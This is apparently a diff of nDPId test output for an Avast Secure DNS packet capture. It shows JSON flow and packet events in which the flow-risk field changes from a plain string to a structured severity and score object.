 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1625413810531,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625413810531,"pkt":"YDjgxTWgeJS0JASgCABFAADMKHAAADERxDm11iOVwKgCZAG73gcAuFki9gaBgAABAAEAAAAAATIJU0VDdXJlZE5TBUFWQXN0A0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625413810414,"flow_last_seen":1625413810531,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625477697370,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625413810414,"flow_last_seen":1625413810531,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625477697370,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477697370,"flow_last_seen":1625477697370,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477697370,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1625477697370,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625477697370,"pkt":"eJS0JASgYDjgxTWgCABFAABDQqcAAH8RXIvAqAJktdYjleMrAbsAL7nVV2EBAAABAAAAAAAAATIJc0VjVVJFZE5zBWFWQVN0A0NvbQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477697370,"flow_last_seen":1625477697370,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477697370,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477697370,"flow_last_seen":1625477697370,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477697370,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1625477697487,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625477697487,"pkt":"YDjgxTWgeJS0JASgCABFAADMthcAADIRNZK11iOVwKgCZAG74ysAuDJEV2GBgAABAAEAAAAAATIJc0VjVVJFZE5zBWFWQVN0A0NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477700767,"flow_last_seen":1625477700767,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477700767,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1625477700767,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625477700767,"pkt":"eJS0JASgYDjgxTWgCABFAABD4k8AAH8RvOLAqAJktdYjlfvnAbsAL7tgPVoBAAABAAAAAAAAATIJc0VjVXJFRE5zBUFWQXN0A0NPTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477700767,"flow_last_seen":1625477700767,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477700767,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477700767,"flow_last_seen":1625477700767,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477700767,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1625477700884,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625477700884,"pkt":"YDjgxTWgeJS0JASgCABFAADMuTUAADIRMnS11iOVwKgCZAG7++cAuDPPPVqBgAABAAEAAAAAATIJc0VjVXJFRE5zBUFWQXN0A0NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477702850,"flow_last_seen":1625477702850,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477702850,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1625477702850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625477702850,"pkt":"eJS0JASgYDjgxTWgCABFAABD4lMAAH8RvN7AqAJktdYjlcIoAbsAL9+b0x0BAAABAAAAAAAAATIJU0VDdXJFZG5TBUF2QXNUA2NvTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477702850,"flow_last_seen":1625477702850,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477702850,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477702850,"flow_last_seen":1625477702850,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477702850,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1625477702968,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625477702968,"pkt":"YDjgxTWgeJS0JASgCABFAADMurcAADERMfK11iOVwKgCZAG7wigAuFgK0x2BgAABAAEAAAAAATIJU0VDdXJFZG5TBUF2QXNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477738051,"flow_last_seen":1625477738051,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477738051,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1625477738051,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625477738051,"pkt":"eJS0JASgYDjgxTWgCABFAABD1LsAAH8RynbAqAJktdYjldgPAbsAL4PhWDEBAAABAAAAAAAAATIJc2VjdXJFZE5TBWF2YVN0A2NPbQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477738051,"flow_last_seen":1625477738051,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477738051,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477738051,"flow_last_seen":1625477738051,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477738051,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1625477738172,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625477738172,"pkt":"YDjgxTWgeJS0JASgCABFAADMCxkAADER4ZC11iOVwKgCZAG72A8AuPxPWDGBgAABAAEAAAAAATIJc2VjdXJFZE5TBWF2YVN0A2NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477739836,"flow_last_seen":1625477739836,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477739836,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1625477739836,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625477739836,"pkt":"eJS0JASgYDjgxTWgCABFAABD1L8AAH8RynLAqAJktdYjldsvAbsAL1UmhCwBAAABAAAAAAAAATIJc0VjVXJlRG5TBWF2QVN0A2NPTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477739836,"flow_last_seen":1625477739836,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477739836,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477739836,"flow_last_seen":1625477739836,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625477739836,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1625477739952,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625477739952,"pkt":"YDjgxTWgeJS0JASgCABFAADMDM8AADIR3tq11iOVwKgCZAG72y8AuM2UhCyBgAABAAEAAAAAATIJc0VjVXJlRG5TBWF2QVN0A2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477738051,"flow_last_seen":1625477738172,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477702850,"flow_last_seen":1625477702968,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477697370,"flow_last_seen":1625477697487,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477739836,"flow_last_seen":1625477739952,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477700767,"flow_last_seen":1625477700884,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477738051,"flow_last_seen":1625477738172,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477702850,"flow_last_seen":1625477702968,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477697370,"flow_last_seen":1625477697487,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477739836,"flow_last_seen":1625477739952,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477700767,"flow_last_seen":1625477700884,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482316411,"flow_last_seen":1625482316411,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
